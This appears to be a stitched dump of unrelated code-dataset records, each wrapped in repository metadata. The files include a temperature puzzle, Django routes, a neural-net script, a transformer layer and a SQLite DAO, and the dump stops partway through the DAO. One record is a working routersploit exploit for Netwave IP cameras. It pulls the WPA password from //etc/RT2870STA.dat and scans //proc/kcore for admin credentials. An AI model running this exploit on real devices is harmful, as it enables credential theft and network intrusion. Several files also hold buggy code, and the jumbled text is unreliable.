n = int(input()) # the number of temperatures to analyse
temp = []
for i in input().split():
# t: a temperature expressed as an integer ranging from -273 to 5526
t = int(i)
temp.append(t)
# Write an answer using print
# To debug: print("Debug messages...", file=sys.stderr, flush=True)
print(proche_zero(temp)) | 26.820513 | 72 | 0.646272 | '''
Author: JIANG Yilun
Date: 2022-02-21 15:13:14
LastEditTime: 2022-02-21 15:16:30
LastEditors: JIANG Yilun
Description:
FilePath: /UGA_INF/INF101/TP/TP6/2.6.1.4_mirror.py
'''
import sys
import math
# Auto-generated code below aims at helping you parse
# the standard input according to the problem statement.
n = int(input()) # the number of temperatures to analyse
temp = []
for i in input().split():
# t: a temperature expressed as an integer ranging from -273 to 5526
t = int(i)
temp.append(t)
# Write an answer using print
# To debug: print("Debug messages...", file=sys.stderr, flush=True)
def proche_zero(list):
    """Return the temperature in *list* closest to zero.

    On a tie between a negative and a positive value (e.g. -5 and 5),
    the positive one wins, as required by the puzzle statement.

    BUG FIX: the previous version wrapped the scan in a bare `except`
    that printed "0" and then fell through to `return temp_temperature`,
    raising UnboundLocalError on an empty input. An empty input now
    returns 0 (keeping the "0" console output).

    The parameter keeps its original (builtin-shadowing) name `list`
    so positional and keyword callers both keep working.
    """
    if not list:
        print("0")
        return 0
    # Sort key: smallest magnitude first; among equal magnitudes the
    # larger (i.e. positive) value first, hence the -t tiebreaker.
    return min(list, key=lambda t: (abs(t), -t))
print(proche_zero(temp)) | 383 | 0 | 23 |
0923b4b9e6beca141814053d0ad67f5a6310a74b | 495 | py | Python | students/k3342/laboratory_works/Shaidullina_Regina/laboratory_work_1/leaderboard/urls.py | TonikX/ITMO_ICT_-WebProgramming_2020 | ba566c1b3ab04585665c69860b713741906935a0 | [
"MIT"
] | 10 | 2020-03-20T09:06:12.000Z | 2021-07-27T13:06:02.000Z | students/k3342/laboratory_works/Shaidullina_Regina/laboratory_work_1/leaderboard/urls.py | TonikX/ITMO_ICT_-WebProgramming_2020 | ba566c1b3ab04585665c69860b713741906935a0 | [
"MIT"
] | 134 | 2020-03-23T09:47:48.000Z | 2022-03-12T01:05:19.000Z | students/k3342/laboratory_works/Shaidullina_Regina/laboratory_work_1/leaderboard/urls.py | TonikX/ITMO_ICT_-WebProgramming_2020 | ba566c1b3ab04585665c69860b713741906935a0 | [
"MIT"
] | 71 | 2020-03-20T12:45:56.000Z | 2021-10-31T19:22:25.000Z | from django.contrib import admin
from django.urls import path
from leaderboard import views
from django.contrib.auth.views import LoginView #, LogoutView
urlpatterns = [
path('', views.main, name='main'),
path('leaderboard/', views.leaderboard_view, name='leaderboard'),
path('comments/', views.comments, name='comments'),
path('register/', views.reg, name='register'),
path('login/', LoginView.as_view(), name='login'),
path('logout/', views.LogoutFormView.as_view(), name='logout'),
]
| 35.357143 | 66 | 0.729293 | from django.contrib import admin
from django.urls import path
from leaderboard import views
from django.contrib.auth.views import LoginView #, LogoutView
# URLconf for the leaderboard app: maps each path to its view.
urlpatterns = [
    path('', views.main, name='main'),
    path('leaderboard/', views.leaderboard_view, name='leaderboard'),
    path('comments/', views.comments, name='comments'),
    path('register/', views.reg, name='register'),
    # Authentication uses Django's stock LoginView; logout is a custom view.
    path('login/', LoginView.as_view(), name='login'),
    path('logout/', views.LogoutFormView.as_view(), name='logout'),
]
| 0 | 0 | 0 |
8e52a4f5718b64fe398109099129281604f196a7 | 456 | py | Python | lib/solutions/SUM/sum_solution.py | DPNT-Sourcecode/CHK-pttv01 | caf1e37c53cee5ab4844a6c9a5f7d904b1461fb0 | [
"Apache-2.0"
] | null | null | null | lib/solutions/SUM/sum_solution.py | DPNT-Sourcecode/CHK-pttv01 | caf1e37c53cee5ab4844a6c9a5f7d904b1461fb0 | [
"Apache-2.0"
] | null | null | null | lib/solutions/SUM/sum_solution.py | DPNT-Sourcecode/CHK-pttv01 | caf1e37c53cee5ab4844a6c9a5f7d904b1461fb0 | [
"Apache-2.0"
] | null | null | null | #!/usr/local/bin/python3
# noinspection PyShadowingBuiltins,PyUnusedLocal
def compute(val1, val2):
    """Add two integers.

    Args:
        val1: Integer between 0 and 100.
        val2: Integer between 0 and 100.

    Returns:
        The sum of val1 and val2.
    """
    return val1 + val2
if __name__ == '__main__':
    # Smoke tests.
    # BUG FIX: the previous code called the builtin sum(1, 3), which raises
    # TypeError (sum expects an iterable); compute() is what is under test.
    print("1 + 3 = {}".format(compute(1, 3)))
    print("0 + 0 = {}".format(compute(0, 0)))
| 24 | 49 | 0.600877 | #!/usr/local/bin/python3
# noinspection PyShadowingBuiltins,PyUnusedLocal
def compute(val1, val2):
    """Add two integers.

    Args:
        val1: Integer between 0 and 100.
        val2: Integer between 0 and 100.

    Returns:
        The sum of val1 and val2.
    """
    return val1 + val2
if __name__ == '__main__':
    # Smoke tests.
    # BUG FIX: the previous code called the builtin sum(1, 3), which raises
    # TypeError (sum expects an iterable); compute() is what is under test.
    print("1 + 3 = {}".format(compute(1, 3)))
    print("0 + 0 = {}".format(compute(0, 0)))
| 0 | 0 | 0 |
50d8c128a8e03e7ecb47c79702d9322f7100c752 | 3,128 | py | Python | DIZED_APPS/INCANTATION/routersploit/modules/exploits/cameras/multi/netwave_IP_camera.py | tanc7/ArmsCommander-TestBed | e00bb166084735d8b0de058b54d6d98a057cd7d8 | [
"FSFUL"
] | 1 | 2018-10-17T04:49:42.000Z | 2018-10-17T04:49:42.000Z | DIZED_APPS/INCANTATION/routersploit/modules/exploits/cameras/multi/netwave_IP_camera.py | tanc7/ArmsCommander-TestBed | e00bb166084735d8b0de058b54d6d98a057cd7d8 | [
"FSFUL"
] | null | null | null | DIZED_APPS/INCANTATION/routersploit/modules/exploits/cameras/multi/netwave_IP_camera.py | tanc7/ArmsCommander-TestBed | e00bb166084735d8b0de058b54d6d98a057cd7d8 | [
"FSFUL"
] | null | null | null | from routersploit import (
exploits,
print_error,
print_success,
print_info,
print_status,
http_request,
mute,
validators,
)
class Exploit(exploits.Exploit):
"""
Netwave IP Camera - Password Disclosure
"""
__info__ = {
'name': 'Netwave_IP_camera',
'description': 'This exploit will try to retrieve WPA password and ddns host name, '
'Also it would try to read memory leak in order to find username and password',
'authors': [
'renos stoikos <rstoikos[at]gmail.com>', # routesploit module
'spiritnull', # exploit-db.com exploit
],
'references': [
'https://www.exploit-db.com/exploits/41236/',
],
'devices': [
'Netwave IP Camera',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port', validators=validators.integer) # default port
@mute
| 37.686747 | 119 | 0.582161 | from routersploit import (
exploits,
print_error,
print_success,
print_info,
print_status,
http_request,
mute,
validators,
)
class Exploit(exploits.Exploit):
    """
    Netwave IP Camera - Password Disclosure
    """
    # Module metadata consumed by the routersploit framework.
    __info__ = {
        'name': 'Netwave_IP_camera',
        'description': 'This exploit will try to retrieve WPA password and ddns host name, '
                       'Also it would try to read memory leak in order to find username and password',
        'authors': [
            'renos stoikos <rstoikos[at]gmail.com>', # routesploit module
            'spiritnull', # exploit-db.com exploit
        ],
        'references': [
            'https://www.exploit-db.com/exploits/41236/',
        ],
        'devices': [
            'Netwave IP Camera',
        ],
    }
    # User-configurable options (set via the routersploit console).
    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
    port = exploits.Option(80, 'Target port', validators=validators.integer) # default port
    def run(self):
        # Entry point called by the framework; everything happens only when
        # check() confirms the target leaks at least one known endpoint.
        if self.check():
            print_success("Target is vulnerable")
            # Information-leak endpoints on vulnerable firmware:
            # url1 -> WiFi driver config (contains the WPA key),
            # url2 -> camera status page (contains the DDNS host name),
            # url3 -> kernel memory, which may contain credentials.
            url1 = "{}:{}//etc/RT2870STA.dat".format(self.target, self.port)
            url2 = "{}:{}/get_status.cgi".format(self.target, self.port)
            url3 = "{}:{}//proc/kcore".format(self.target, self.port)
            response = http_request(method="GET", url=url1)
            if response is not None and "WPAPSK" in response.text:
                print_success("WPA Password is in this text:")
                print_info(response.text)
            else:
                print_error("Could not find WPA password")
            print_info("Trying to gather more info")
            response = http_request(method="GET", url=url2)
            if response is not None and "ddns_host" in response.text:
                print_success("ddns host name:")
                print_info(response.text)
            else:
                print_error("could not read ddns host name")
            print_status("Trying to find username and password from running memory leak")
            print_status("This could take some time")
            print_status("password is usually stuck next to 'admin' e.g admin123456")
            # stream=True: /proc/kcore is effectively unbounded, so it must
            # be read incrementally rather than buffered whole.
            response = http_request(method="GET", url=url3, stream=True)
            try:
                # NOTE(review): on Python 3, iter_content() yields bytes, so
                # the str-in-bytes test `"admin" in chunk` raises TypeError
                # which is swallowed by the except below — confirm the
                # intended Python version or decode each chunk first.
                for chunk in response.iter_content(chunk_size=100):
                    if "admin" in chunk:
                        print_success(chunk)
            except Exception:
                print_error("Exploit failed - could not read /proc/kcore")
    @mute
    def check(self):
        # Probe the two leak endpoints; the target is considered vulnerable
        # if either responds with its telltale content.
        url1 = "{}:{}//etc/RT2870STA.dat".format(self.target, self.port)
        url2 = "{}:{}/get_status.cgi".format(self.target, self.port)
        check1 = http_request(method="GET", url=url1)
        if check1 is not None and check1.status_code == 200 and "WPAPSK" in check1.text:
            return True
        check2 = http_request(method="GET", url=url2)
        if check2 is not None and check2.status_code == 200 and "ddns" in check2.text:
            return True
        return False
| 2,025 | 0 | 53 |
4f76e389f54e3aa0502a094ec4b3d7cc71a662bd | 3,101 | py | Python | ipbm-old/controller/util/python/generate_header_json_from_file.py | jijinfanhua/IPSA-ipbm | c82dc003bf9c68ba029814d7539f502fd29e1326 | [
"Apache-2.0"
] | null | null | null | ipbm-old/controller/util/python/generate_header_json_from_file.py | jijinfanhua/IPSA-ipbm | c82dc003bf9c68ba029814d7539f502fd29e1326 | [
"Apache-2.0"
] | null | null | null | ipbm-old/controller/util/python/generate_header_json_from_file.py | jijinfanhua/IPSA-ipbm | c82dc003bf9c68ba029814d7539f502fd29e1326 | [
"Apache-2.0"
] | null | null | null | import json
from basic_class import *
# fp = open("../config/header_pure.txt", "r")
fp = open("../../config/header_pure.txt", "r")
header_list = []
while True:
line = fp.readline()
# print(line)
if line == "*":
break
elif line == "":
continue
else:
l = line.split()
if line[0] == 'h':
header = Header(l[1], int(l[2]), int(l[3]))
header_list.append(header)
elif line[0] == 'f':
field = Field(l[1], int(l[2]), int(l[3]))
header_list[-1].addField(field)
elif line[0] == 'n':
if int(l[2]) == 0:
continue
header_list[-1].next_header_type_internal_offset = int(l[1])
header_list[-1].next_header_type_length = int(l[2])
elif line[0] == 'm':
if l[2] == "0":
continue
next_header = NextHeader(l[1], l[2])
header_list[-1].addNextHeader(next_header)
json_data = {}
for header in header_list:
fields = header.fields
next_headers = header.next_headers
field_dict = {}
next_header_dict = {}
for field in fields:
field_dict[field.field_name] = {"field_name": field.field_name,
"field_length": field.field_length,
"field_internal_offset": field.field_internal_offset}
for next_header in next_headers:
next_header_dict[next_header.header_tag] = {"header_tag": next_header.header_tag,
"header_name": next_header.header_name}
json_data[header.header_name] = {"header_name": header.header_name,
"header_length": header.header_length,
"next_header_type_internal_offset": header.next_header_type_internal_offset,
"next_header_type_length": header.next_header_type_length,
"field_num": header.field_num,
"fields": field_dict,
"next_headers": next_header_dict}
filename = "../../config/header.json"
with open(filename, 'w') as file_obj:
json.dump(json_data, file_obj, indent=3)
# json_string = json.dumps(json_data, indent=3)
# print(json_string)
# print('Header: {}'.format(header.header_name))
# print('\theader length: {}'.format(header.header_length))
# print('\tfield num: {}'.format(header.field_num))
# if(header.next_header_type_length != 0):
# print('\tnext_header_type_internal_offset: {}'.format(header.next_header_type_internal_offset))
# print('\tnext_header_type_length: {}'.format(header.next_header_type_length))
# print('\tFields:')
# for field in header.fields:
# print('\t\t{} {} {}'.format(field.field_name, field.field_length, field.field_internal_offset))
# print('\tNext Headers:')
# for next_header in header.next_headers:
# print('\t\t{} {}'.format(next_header.header_tag, next_header.header_name))
| 41.346667 | 113 | 0.570461 | import json
from basic_class import *
# fp = open("../config/header_pure.txt", "r")
# Parse the plain-text header description and emit it as header.json.
# Record types (first character of each line, as used below):
#   h <name> <length> <field_num>  -> new Header
#   f <name> <length> <offset>     -> Field added to the current header
#   n <offset> <length>            -> next-header-type location (skipped if length 0)
#   m <tag> <name>                 -> tag -> next-header mapping (skipped if name "0")
fp = open("../../config/header_pure.txt", "r")
header_list = []
while True:
    line = fp.readline()
    # print(line)
    # NOTE(review): readline() keeps the trailing "\n", so the "*" sentinel
    # only matches when it is the very last line WITHOUT a newline; and at
    # EOF readline() returns "", which hits the `continue` branch, so a file
    # missing the sentinel loops forever — confirm the input file format.
    if line == "*":
        break
    elif line == "":
        continue
    else:
        l = line.split()
        if line[0] == 'h':
            header = Header(l[1], int(l[2]), int(l[3]))
            header_list.append(header)
        elif line[0] == 'f':
            field = Field(l[1], int(l[2]), int(l[3]))
            header_list[-1].addField(field)
        elif line[0] == 'n':
            if int(l[2]) == 0:
                continue
            header_list[-1].next_header_type_internal_offset = int(l[1])
            header_list[-1].next_header_type_length = int(l[2])
        elif line[0] == 'm':
            if l[2] == "0":
                continue
            next_header = NextHeader(l[1], l[2])
            header_list[-1].addNextHeader(next_header)
# NOTE(review): fp is never closed; consider a `with` block.
# Convert the parsed Header objects into a JSON-serializable dict keyed by
# header name; fields and next-headers become nested dicts.
json_data = {}
for header in header_list:
    fields = header.fields
    next_headers = header.next_headers
    field_dict = {}
    next_header_dict = {}
    for field in fields:
        field_dict[field.field_name] = {"field_name": field.field_name,
                                        "field_length": field.field_length,
                                        "field_internal_offset": field.field_internal_offset}
    for next_header in next_headers:
        next_header_dict[next_header.header_tag] = {"header_tag": next_header.header_tag,
                                                    "header_name": next_header.header_name}
    json_data[header.header_name] = {"header_name": header.header_name,
                                     "header_length": header.header_length,
                                     "next_header_type_internal_offset": header.next_header_type_internal_offset,
                                     "next_header_type_length": header.next_header_type_length,
                                     "field_num": header.field_num,
                                     "fields": field_dict,
                                     "next_headers": next_header_dict}
filename = "../../config/header.json"
with open(filename, 'w') as file_obj:
    json.dump(json_data, file_obj, indent=3)
# json_string = json.dumps(json_data, indent=3)
# print(json_string)
# print('Header: {}'.format(header.header_name))
# print('\theader length: {}'.format(header.header_length))
# print('\tfield num: {}'.format(header.field_num))
# if(header.next_header_type_length != 0):
#     print('\tnext_header_type_internal_offset: {}'.format(header.next_header_type_internal_offset))
#     print('\tnext_header_type_length: {}'.format(header.next_header_type_length))
# print('\tFields:')
# for field in header.fields:
#     print('\t\t{} {} {}'.format(field.field_name, field.field_length, field.field_internal_offset))
# print('\tNext Headers:')
# for next_header in header.next_headers:
#     print('\t\t{} {}'.format(next_header.header_tag, next_header.header_name))
| 0 | 0 | 0 |
d1b6bda899be2b2c1c9f15895d3f6979a97d89d0 | 649 | py | Python | NN utilizando PIXELES/rendimiento_de_theta_de_pixeles.py | DussanFreire/NN-used-to-recognize-numbers-and-basic-operations | e023e1bd698b8acc2b01b796dd5a8036946f617f | [
"MIT"
] | null | null | null | NN utilizando PIXELES/rendimiento_de_theta_de_pixeles.py | DussanFreire/NN-used-to-recognize-numbers-and-basic-operations | e023e1bd698b8acc2b01b796dd5a8036946f617f | [
"MIT"
] | null | null | null | NN utilizando PIXELES/rendimiento_de_theta_de_pixeles.py | DussanFreire/NN-used-to-recognize-numbers-and-basic-operations | e023e1bd698b8acc2b01b796dd5a8036946f617f | [
"MIT"
] | null | null | null | from RedNeuronal import RedNeuronal
import h5py
# direccion alvaro
# data = h5py.File(r"C:\Users\Lenovo\Downloads\modelado\practica_3\digitos.h5", "r")
# direccion dussan
data = h5py.File(r"C:\Users\Dussan\Desktop\digitos_con_signos.h5", "r")
X_train = data["X_train"][:]
y_train = data["y_train"][:]
X_test = data["X_test"][:]
y_test = data["y_test"][:]
r= RedNeuronal()
#Por cada valor
r.capa1 = 784
r.capa2 = 256
r.capa3 = 64
r.capa4 = 12
r.inicializar_parametros()
r.fit(X_train, y_train)
r.cargar("theta_digitos.h5")
# mostrar rrendimiento en consola
r.obtener_presicion(X_test, y_test)
r.obtener_matriz_confusion_por_valor(X_test, y_test) | 24.037037 | 84 | 0.74114 | from RedNeuronal import RedNeuronal
import h5py
# direccion alvaro
# data = h5py.File(r"C:\Users\Lenovo\Downloads\modelado\practica_3\digitos.h5", "r")
# direccion dussan
data = h5py.File(r"C:\Users\Dussan\Desktop\digitos_con_signos.h5", "r")
X_train = data["X_train"][:]
y_train = data["y_train"][:]
X_test = data["X_test"][:]
y_test = data["y_test"][:]
r= RedNeuronal()
#Por cada valor
r.capa1 = 784
r.capa2 = 256
r.capa3 = 64
r.capa4 = 12
r.inicializar_parametros()
r.fit(X_train, y_train)
r.cargar("theta_digitos.h5")
# mostrar rrendimiento en consola
r.obtener_presicion(X_test, y_test)
r.obtener_matriz_confusion_por_valor(X_test, y_test) | 0 | 0 | 0 |
0f223ad90181adf72be759f9ee7f7d47f3d7ed0c | 2,594 | py | Python | Utility/Torch/Models/Supertransformer/Layers/DeepMemory.py | smithblack-0/Utility | 875ab69fffad1412174d9d0a1de70edc1fd64152 | [
"MIT"
] | null | null | null | Utility/Torch/Models/Supertransformer/Layers/DeepMemory.py | smithblack-0/Utility | 875ab69fffad1412174d9d0a1de70edc1fd64152 | [
"MIT"
] | null | null | null | Utility/Torch/Models/Supertransformer/Layers/DeepMemory.py | smithblack-0/Utility | 875ab69fffad1412174d9d0a1de70edc1fd64152 | [
"MIT"
] | null | null | null | """
A class for the deep memory process. Deep memory is a flavor spawned by the techniques
displayed in Memorizing Transformers (https://arxiv.org/abs/2203.08913). However,
rather thqn saving each instance to an external memory bank, instead we search a
space of differential memory, and only train the topk instances
"""
from typing import Optional
import torch
from torch import nn
from Utility.Torch.Learnables import Layers
class DeepMemoryTransformer(nn.Module):
"""
Deep Memory is designed to allow efficient computation and collection
of facts gathered from a variety of sources with minimal overhead.
The input to the layer is, as is standard, the query. The key and
value, however, are generated internally from a stored bank of
parameters which are intended to change rapidly
TopK is used to limit the regions which may be active at a particular
time, providing some degree of binning
"""
def __init__(self,
query_width: int,
output_width: int,
memory_length: int,
heads: int,
topk: int,
):
"""
:param query_width: How wide the query embedding width is
:param output_width: How wide the output width will be
:param memory_length: How long the memory will be.
:param heads: The number of heads to make.
:param topk: The number of entities to keep per head.
"""
assert query_width % heads == 0
super().__init__()
head_width = query_width//heads
memory = torch.zeros([heads, memory_length, head_width], requires_grad=True)
memory = torch.nn.init.kaiming_uniform(memory, requires_grad=True)
self.memory = nn.Parameter(memory, requires_grad=True)
self.topk = topk
self.query_projector([query_width], [heads, head_width])
self.key_projector([head_width], [head_width], heads)
self.final_projector([heads, head_width], [output_width])
| 35.054054 | 86 | 0.660756 | """
A class for the deep memory process. Deep memory is a flavor spawned by the techniques
displayed in Memorizing Transformers (https://arxiv.org/abs/2203.08913). However,
rather thqn saving each instance to an external memory bank, instead we search a
space of differential memory, and only train the topk instances
"""
from typing import Optional
import torch
from torch import nn
from Utility.Torch.Learnables import Layers
class DeepMemoryTransformer(nn.Module):
    """
    Deep Memory is designed to allow efficient computation and collection
    of facts gathered from a variety of sources with minimal overhead.
    The input to the layer is, as is standard, the query. The key and
    value, however, are generated internally from a stored bank of
    parameters which are intended to change rapidly
    TopK is used to limit the regions which may be active at a particular
    time, providing some degree of binning
    """
    def __init__(self,
                 query_width: int,
                 output_width: int,
                 memory_length: int,
                 heads: int,
                 topk: int,
                 ):
        """
        :param query_width: How wide the query embedding width is
        :param output_width: How wide the output width will be
        :param memory_length: How long the memory will be.
        :param heads: The number of heads to make.
        :param topk: The number of entities to keep per head.
        """
        # The query width must split evenly across the attention heads.
        assert query_width % heads == 0
        super().__init__()
        head_width = query_width//heads
        # Learnable memory bank of shape (heads, memory_length, head_width).
        memory = torch.zeros([heads, memory_length, head_width], requires_grad=True)
        # NOTE(review): torch.nn.init.kaiming_uniform takes no `requires_grad`
        # keyword (and the in-place variant kaiming_uniform_ is the current
        # API) — as written this call raises TypeError at construction.
        memory = torch.nn.init.kaiming_uniform(memory, requires_grad=True)
        self.memory = nn.Parameter(memory, requires_grad=True)
        self.topk = topk
        # NOTE(review): the three lines below CALL attributes that are never
        # assigned, so construction raises AttributeError. Presumably each
        # was meant to be an assignment of a projection layer from the
        # Utility.Torch.Learnables.Layers module — confirm the intended API.
        self.query_projector([query_width], [heads, head_width])
        self.key_projector([head_width], [head_width], heads)
        self.final_projector([heads, head_width], [output_width])
    def forward(self, tensor: torch.Tensor) -> torch.Tensor:
        # Project the input into per-head query space and bring the head
        # dimension forward.
        query = self.query_projector(tensor).transpose(-2, -3)
        # Keys derived from the learnable memory bank.
        keys = self.key_projector(self.memory).unsqueeze(-1)
        # Attention-like scores between queries and memory keys.
        score = torch.matmul(query, keys).squeeze(-1)
        # Keep only the topk memory entries per head; only these receive
        # gradient, which is the "binning" described in the class docstring.
        top, topindices = score.topk(self.topk, dim=-2)
        score = torch.sigmoid(top) # (..., head, items, memitems)
        values = self.memory[..., topindices, :] # (..., head, memitems, encodings)
        # Weighted sum of the selected memory values.
        output = torch.matmul(score, values)
        output = self.final_projector(output.transpose(-2, -3))
        return output
| 537 | 0 | 26 |
6fafe0b4501bda51210d04a842b5f2ca1523ff1d | 9,781 | py | Python | litedao/__init__.py | pyrustic/litedao | 9d34879996aa5248db734491444976225380b362 | [
"MIT"
] | null | null | null | litedao/__init__.py | pyrustic/litedao | 9d34879996aa5248db734491444976225380b362 | [
"MIT"
] | null | null | null | litedao/__init__.py | pyrustic/litedao | 9d34879996aa5248db734491444976225380b362 | [
"MIT"
] | null | null | null | import sqlite3 as sqlite
import os.path
import atexit
import threading
class Litedao:
"""
It's recommended to use Dao by composition. Meaning: don't subclass it.
DAO: Data Access Object (this one is built to work with SQLite).
You give an SQL request with some params or not, it spills out the result nicely !
You can even get the list of tables or columns.
"""
def __init__(self, path, init_script=None, raise_exception=True,
raise_warning=True, connection_kwargs=None):
"""
- path: absolute path to database file
- init_script: a path to a file, a file-like object or a string of sql code
Example_a: "CREATE TABLE my_table(id INTEGER NOT NULL PRIMARY KEY);"
Example_b: "/path/to/script.sql"
- raise_exception: By default, True, so exceptions (sqlite.Error) will be raised
- raise_warning: By default, True, so exceptions (sqlite.Warning) will be raised
- connection_kwargs: connections arguments used while calling the
method "sqlite.connect()"
"""
self._path = os.path.normpath(path)
self._init_script = init_script
self._raise_exception = raise_exception
self._raise_warning = raise_warning
self._lock = threading.Lock()
use_init_script = False
self._con = None
self._is_new = False
if not os.path.isfile(path):
self._is_new = True
use_init_script = True
try:
connection_kwargs = {} if connection_kwargs is None else connection_kwargs
if "check_same_thread" in connection_kwargs:
del connection_kwargs["check_same_thread"]
self._con = sqlite.connect(path,
check_same_thread=False,
**connection_kwargs)
except sqlite.Error as e:
raise e
finally:
atexit.register(self.close)
if use_init_script and init_script:
self.script(init_script)
# ====================================
# PROPERTIES
# ====================================
@property
@property
def con(self):
"""
Connection object
"""
return self._con
@property
@property
def is_new(self):
"""
Returns True if the database has just been created, otherwise returns False
"""
return self._is_new
# ====================================
# PUBLIC METHODS
# ====================================
def test(self):
"""
Returns True if this is a legal database, otherwise returns False
"""
cache = self._raise_exception
self._raise_exception = True
legal = True
try:
self.tables()
except sqlite.Error as e:
legal = False
except sqlite.Warning as e:
legal = False
self._raise_exception = cache
return legal
def edit(self, sql, param=None):
"""
Use this method to edit your database.
Formally: Data Definition Language (DDL) and Data Manipulation Language (DML).
It returns True or False or raises sqlite.Error, sqlite.Warning
"""
with self._lock:
param = () if param is None else param
result = True
cur = None
try:
cur = self._con.cursor()
cur.execute(sql, param)
self._con.commit()
except sqlite.Error as e:
result = False
if self._raise_exception:
raise
except sqlite.Warning as e:
result = False
if self._raise_warning:
raise
finally:
if cur:
cur.close()
return result
def query(self, sql, param=None):
"""
Use this method to query your database.
Formally: Data Query Language (DQL)
It returns a tuple: (data, description).
Data is a list with data from ur query.
Description is a list with the name of columns related to data
Example: ( [1, "Jack", 50], ["id", "name", "age"] )
This method can raise sqlite.Error, sqlite.Warning
"""
with self._lock:
param = () if param is None else param
description = []
data = []
cur = None
try:
cur = self._con.cursor()
cur.execute(sql, param)
data = cur.fetchall()
description = cur.description
except sqlite.Error as e:
if self._raise_exception:
raise
except sqlite.Warning as e:
if self._raise_warning:
raise
finally:
if cur:
cur.close()
return [x[0] for x in description], data
def script(self, script):
"""
Executes the script as an sql-script. Meaning: there are multiple lines of sql.
This method returns nothing but could raise sqlite.Error, sqlite.Warning.
script could be a path to a file, a file-like object or just a string.
"""
with self._lock:
cur = None
try:
script = self._stringify_script(script)
cur = self._con.cursor()
cur.executescript(script)
except sqlite.Error as e:
if self._raise_exception:
raise
except sqlite.Warning as e:
if self._raise_warning:
raise
finally:
if cur:
cur.close()
def export(self):
"""
export the database: it returns a string of sql code.
This method can raise sqlite.Error, sqlite.Warning
"""
with self._lock:
result = ""
try:
"\n".join(self._con.iterdump())
except sqlite.Error as e:
if self._raise_exception:
raise
except sqlite.Warning as e:
if self._raise_warning:
raise
return result
def tables(self):
"""
Returns the list of tables names.
Example: ["table_1", "table_2"]
This method can raise sqlite.Error, sqlite.Warning
"""
with self._lock:
data = []
cur = None
try:
cur = self._con.cursor()
cur.execute("SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")
data = cur.fetchall()
except sqlite.Error as e:
if self._raise_exception:
raise
except sqlite.Warning as e:
if self._raise_warning:
raise
finally:
if cur:
cur.close()
return [item[0] for item in data]
def columns(self, table):
    """
    Returns the list of columns names of the given table name
    A column is like:
    (int_id, str_column_name, str_column_datatype, int_boolean_nullability,
    default_value, int_primary_key)
    Example:
    [(0, "id", "INTEGER", 1, None, 1),
    (1, "name", "TEXT", 0, None, 0),
    (2, "age", "INTEGER", 1, None, 0)]
    This method can raise sqlite.Error, sqlite.Warning
    """
    with self._lock:
        data = []
        cur = None
        try:
            cur = self._con.cursor()
            # NOTE(review): the table name is interpolated directly into the
            # PRAGMA (PRAGMAs cannot take bound parameters) — callers must not
            # pass untrusted table names here.
            cur.execute("pragma table_info('{}')".format(table))
            data = cur.fetchall()
        except sqlite.Error as e:
            # Errors are swallowed unless configured to re-raise.
            if self._raise_exception:
                raise
        except sqlite.Warning as e:
            if self._raise_warning:
                raise
        finally:
            if cur:
                cur.close()
        # Empty list when the table does not exist or an error was swallowed.
        return data
def close(self):
    """
    Well, it closes the connection
    """
    with self._lock:
        if self._con:
            try:
                self._con.close()
            except Exception:
                # Best-effort close: a failure here is deliberately ignored.
                pass
            self._con = None
            # close() was registered with atexit at construction time;
            # drop that registration so a closed DAO is not touched again
            # at interpreter shutdown.
            atexit.unregister(self.close)
def _stringify_script(self, script):
""" This method will:
- try to read the script: if the script is a file-like object,
the content (string) will be returned
- try to open the script: if the script is a path to a file,
the content (string) will be returned
- if the script is already a string, it will be returned as it,
- the script will be returned as it if failed to read/open
"""
# if script is a file-like object
try:
script = script.read()
except Exception as e:
pass
else:
return script
# if script is a path to a file
try:
with open(script, "r") as file:
script = file.read()
except Exception as e:
pass
else:
return script
return script
| 32.712375 | 109 | 0.51048 | import sqlite3 as sqlite
import os.path
import atexit
import threading
class Litedao:
    """
    SQLite Data Access Object (use it by composition; don't subclass it).

    You give an SQL request with some params or not, it spills out the
    result nicely! You can also list tables and columns, run SQL scripts
    and dump the whole database.

    All public methods serialize access through a single lock, so one
    instance may be shared between threads (check_same_thread is forced
    off). sqlite.Error / sqlite.Warning are swallowed unless the
    corresponding raise_exception / raise_warning flags are True
    (the default).
    """

    def __init__(self, path, init_script=None, raise_exception=True,
                 raise_warning=True, connection_kwargs=None):
        """
        - path: absolute path to database file
        - init_script: a path to a file, a file-like object or a string of sql
          code, executed only when the database file does not exist yet.
            Example_a: "CREATE TABLE my_table(id INTEGER NOT NULL PRIMARY KEY);"
            Example_b: "/path/to/script.sql"
        - raise_exception: By default, True, so exceptions (sqlite.Error) will be raised
        - raise_warning: By default, True, so exceptions (sqlite.Warning) will be raised
        - connection_kwargs: connections arguments used while calling the
          method "sqlite.connect()"
        """
        self._path = os.path.normpath(path)
        self._init_script = init_script
        self._raise_exception = raise_exception
        self._raise_warning = raise_warning
        self._lock = threading.Lock()
        use_init_script = False
        self._con = None
        self._is_new = False
        if not os.path.isfile(path):
            # The database file is about to be created: run init_script.
            self._is_new = True
            use_init_script = True
        try:
            connection_kwargs = {} if connection_kwargs is None else connection_kwargs
            # check_same_thread is forced to False below (self._lock already
            # serializes access), so drop any caller-supplied duplicate.
            if "check_same_thread" in connection_kwargs:
                del connection_kwargs["check_same_thread"]
            self._con = sqlite.connect(path,
                                       check_same_thread=False,
                                       **connection_kwargs)
        finally:
            # Ensure the connection is closed at interpreter exit even if
            # connect() failed (close() tolerates a missing connection).
            atexit.register(self.close)
        if use_init_script and init_script:
            self.script(init_script)

    # ====================================
    #           PROPERTIES
    # ====================================
    @property
    def path(self):
        """Normalized path to the database file."""
        return self._path

    @property
    def con(self):
        """
        Connection object (None after close()).
        """
        return self._con

    @property
    def init_script(self):
        """The init_script argument given at construction time."""
        return self._init_script

    @property
    def is_new(self):
        """
        Returns True if the database has just been created, otherwise returns False
        """
        return self._is_new

    # ====================================
    #          PUBLIC METHODS
    # ====================================
    def test(self):
        """
        Returns True if this is a legal database, otherwise returns False
        """
        # Temporarily force errors to raise so a broken file is detected.
        cache = self._raise_exception
        self._raise_exception = True
        legal = True
        try:
            self.tables()
        except (sqlite.Error, sqlite.Warning):
            legal = False
        self._raise_exception = cache
        return legal

    def edit(self, sql, param=None):
        """
        Use this method to edit your database.
        Formally: Data Definition Language (DDL) and Data Manipulation Language (DML).
        It returns True or False or raises sqlite.Error, sqlite.Warning
        """
        with self._lock:
            param = () if param is None else param
            result = True
            cur = None
            try:
                cur = self._con.cursor()
